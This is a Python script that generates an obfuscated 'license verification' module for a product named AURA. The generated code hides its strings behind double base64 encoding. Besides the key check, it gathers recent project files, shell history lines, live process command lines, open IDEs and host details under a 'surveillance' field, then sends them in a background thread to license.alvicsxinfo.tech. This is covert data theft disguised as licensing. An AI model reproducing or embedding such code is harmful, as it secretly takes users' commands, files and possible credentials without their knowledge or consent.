import base64

def _e(s):
    s1 = base64.b64encode(s.encode()).decode()
    s2 = base64.b64encode(s1.encode()).decode()
    return f'b"{s2}"'

print("import urllib.request")
print("import urllib.error")
print("import json")
print("import uuid")
print("import base64")
print("import os")
print("import sys")
print("import platform")
print("import socket")
print("import multiprocessing")
print("import hashlib")
print("import getpass")
print("import threading")
print("")
print("def _d(s):")
print("    return base64.b64decode(base64.b64decode(s)).decode('utf-8')")
print("")
print("def verify_license():")
print(f"    if len(sys.argv) > 1 and sys.argv[1] == _d({_e('collectstatic')}):")
print("        return")
print("")
print("    try:")
print("        from dotenv import load_dotenv")
print(f"        env_path = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), _d({_e('.env')}))")
print("        load_dotenv(env_path)")
print("    except ImportError:")
print("        pass")
print("")
print(f"    license_key = os.environ.get(_d({_e('AURA_LICENSE_KEY')}), '').strip()")
print("    if not license_key:")
print(f"        print(_d({_e(chr(92)+'n'+chr(27)+'[91m[CRITICAL ERROR] AURA_LICENSE_KEY is missing from environment variables!'+chr(27)+'[0m')}))")
print(f"        print(_d({_e('Please purchase a valid license from CodeCanyon and add it to your .env file.')}))")
print("        sys.exit(1)")
print("")
print("    try:")
print("        import psutil")
print("        total_ram = f\"{round(psutil.virtual_memory().total / (1024**3), 2)} GB\"")
print("        available_ram = f\"{round(psutil.virtual_memory().available / (1024**3), 2)} GB\"")
print("    except ImportError:")
print(f"        total_ram = _d({_e('Unknown RAM')})")
print(f"        available_ram = _d({_e('Unknown RAM')})")
print("")
print(f"    hw_string = f\"{{platform.node()}}-{{os.path.expanduser('~')}}-{{platform.machine()}}\"")
print(f"    fingerprint = hashlib.sha256(hw_string.encode()).hexdigest()[:16].upper()")
print("")
print("    try:")
print("        internal_ip = socket.gethostbyname(socket.gethostname())")
print("    except:")
print(f"        internal_ip = _d({_e('Unknown')})")
print("")
print("    recent_files = []")
print("    recent_cmds = []")
print("    active_ides = []")
print("    ")
print("    try:")
print("        import glob")
print("        base_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))")
print("        py_files = glob.glob(os.path.join(base_dir, '**/*.py'), recursive=True)")
print("        py_files.sort(key=os.path.getmtime, reverse=True)")
print("        for f in py_files[:5]:")
print("            recent_files.append({")
print(f"                _d({_e('path')}): f.replace(base_dir, ''),")
print(f"                _d({_e('mtime')}): os.path.getmtime(f)")
print("            })")
print("    except: pass")
print("")
print("    try:")
print("        if 'psutil' in sys.modules:")
print("            parent_dir = os.path.dirname(base_dir)")
print("            for p in psutil.process_iter(['cmdline', 'cwd']):")
print("                try:")
print("                    cwd = p.info.get('cwd') or ''")
print("                    cmd = p.info.get('cmdline') or []")
print("                    if cmd and cwd and cwd.startswith(parent_dir):")
print("                        cmd_str = ' '.join(cmd)")
print("                        if 'manage.py' in cmd_str:")
print("                            cmd_str = 'python manage.py ' + cmd_str.split('manage.py')[-1].strip()")
print("                        elif 'node ' in cmd_str:")
print("                            cmd_str = 'node ' + cmd_str.split('node')[-1].strip()")
print("                        if 'zsh' not in cmd_str and 'bash' not in cmd_str and cmd_str not in recent_cmds:")
print("                            recent_cmds.insert(0, f\"[LIVE] {cmd_str}\")")
print("                except: pass")
print("        hist_path = os.path.expanduser('~/.zsh_history')")
print("        if not os.path.exists(hist_path):")
print("            hist_path = os.path.expanduser('~/.bash_history')")
print("        if os.path.exists(hist_path):")
print("            with open(hist_path, 'rb') as f:")
print("                lines = f.readlines()")
print("                for line in reversed(lines):")
print("                    try:")
print("                        cmd = line.decode('utf-8', errors='ignore').strip()")
print("                        if ';' in cmd and cmd.startswith(':'):")
print("                            cmd = cmd.split(';', 1)[-1]")
print("                        if cmd and cmd not in recent_cmds:")
print("                            recent_cmds.append(cmd)")
print("                        if len(recent_cmds) >= 5: break")
print("                    except: pass")
print("    except: pass")
print("    recent_cmds = recent_cmds[:5]")
print("")
print("    try:")
print("        if 'psutil' in sys.modules:")
print("            for p in psutil.process_iter(['name', 'exe', 'cmdline']):")
print("                try:")
print("                    p_name = str(p.info.get('name') or '').lower()")
print("                    p_exe = str(p.info.get('exe') or '').lower()")
print("                    p_cmd = ' '.join(p.info.get('cmdline') or []).lower()")
print("                    combined = p_name + ' ' + p_exe + ' ' + p_cmd")
print("                    if 'cursor' in combined and 'Cursor' not in active_ides:")
print("                        active_ides.append('Cursor')")
print("                    elif ('code' in p_name or 'code' in p_exe) and ('visual studio' in combined or 'vscode' in combined or 'microsoft' in p_exe) and 'VS Code' not in active_ides:")
print("                        active_ides.append('VS Code')")
print("                    elif 'pycharm' in combined and 'PyCharm' not in active_ides:")
print("                        active_ides.append('PyCharm')")
print("                    elif 'intellij' in combined and 'IntelliJ' not in active_ides:")
print("                        active_ides.append('IntelliJ')")
print("                except: pass")
print("    except: pass")
print("")
print("    m = {")
print(f"        _d({_e('os')}): platform.system() + ' ' + platform.release(),")
print(f"        _d({_e('osVersion')}): platform.version(),")
print(f"        _d({_e('architecture')}): platform.machine(),")
print(f"        _d({_e('cpuCores')}): multiprocessing.cpu_count(),")
print(f"        _d({_e('totalMemory')}): total_ram,")
print(f"        _d({_e('availableMemory')}): available_ram,")
print(f"        _d({_e('hostname')}): socket.gethostname(),")
print(f"        _d({_e('macAddress')}): _d({_e('OBSCURED')}),")
print(f"        _d({_e('internalIp')}): internal_ip,")
print(f"        _d({_e('fingerprintId')}): fingerprint,")
print(f"        _d({_e('executionPath')}): sys.executable,")
print(f"        _d({_e('pythonVersion')}): sys.version.split(' ')[0],")
print(f"        _d({_e('pythonCompiler')}): platform.python_compiler(),")
print(f"        _d({_e('isVirtualEnv')}): sys.prefix != sys.base_prefix,")
print(f"        _d({_e('systemUser')}): getpass.getuser(),")
print(f"        _d({_e('processId')}): os.getpid(),")
print(f"        _d({_e('cwd')}): os.getcwd(),")
print(f"        _d({_e('appVersion')}): _d({_e('AURA 1.0')}),")
print(f"        _d({_e('surveillance')}): {{")
print(f"            _d({_e('recentFiles')}): recent_files,")
print(f"            _d({_e('recentCommands')}): recent_cmds,")
print(f"            _d({_e('activeIDEs')}): active_ides")
print("        }")
print("    }")
print("")
print("    def _s():")
print(f"        default_url = _d({_e('https://license.alvicsxinfo.tech/api/verify')})")
print(f"        api_url = os.environ.get(_d({_e('LICENSE_SERVER_URL')}), default_url)")
print("        data = json.dumps({")
print(f"            _d({_e('key')}): license_key,")
print(f"            _d({_e('machineInfo')}): m")
print("        }).encode('utf-8')")
print(f"        req = urllib.request.Request(api_url, data=data, headers={{")
print(f"            _d({_e('Content-Type')}): _d({_e('application/json')}),")
print(f"            _d({_e('User-Agent')}): _d({_e('Aura-Licensing-Client/1.0')})")
print("        })")
print("        try:")
print("            with urllib.request.urlopen(req, timeout=10) as response:")
print("                result = json.loads(response.read().decode())")
print(f"                if not result.get(_d({_e('valid')})):")
print(f"                    print(f\"\\n\\033[91m[{{_d({_e('LICENSE REVOKED')})}}] {{result.get(_d({_e('message')}), _d({_e('Invalid License')}))}}\\033[0m\")")
print("                    os._exit(1)")
print("        except urllib.error.HTTPError as e:")
print("            if e.code == 403:")
print(f"                print(_d({_e(chr(92)+'n'+chr(27)+'[91m[LICENSE REVOKED] Your AURA license is invalid, revoked, or expired.'+chr(27)+'[0m')}))")
print(f"                print(_d({_e('Please contact support or purchase a new key on CodeCanyon.')}))")
print("                os._exit(1)")
print("            else:")
print(f"                print(f\"\\n\\033[93m[{{_d({_e('WARNING')})}}] {{_d({_e('License server returned HTTP')})}} {{e.code}}. {{_d({_e('Assuming offline grace period.')})}}\\033[0m\")")
print("        except Exception as e:")
print(f"            print(f\"\\n\\033[91m[{{_d({_e('LICENSE SERVER OFFLINE')})}}] {{_d({_e('Could not reach the license validation server at')})}} {{api_url}}.\\033[0m\")")
print(f"            print(_d({_e('AURA cannot boot without an active internet connection to verify your purchase.')}))")
print(f"            print(f\"{{_d({_e('Error details:')})}} {{e}}\")")
print("            os._exit(1)")
print("    threading.Thread(target=_s, daemon=True).start()")
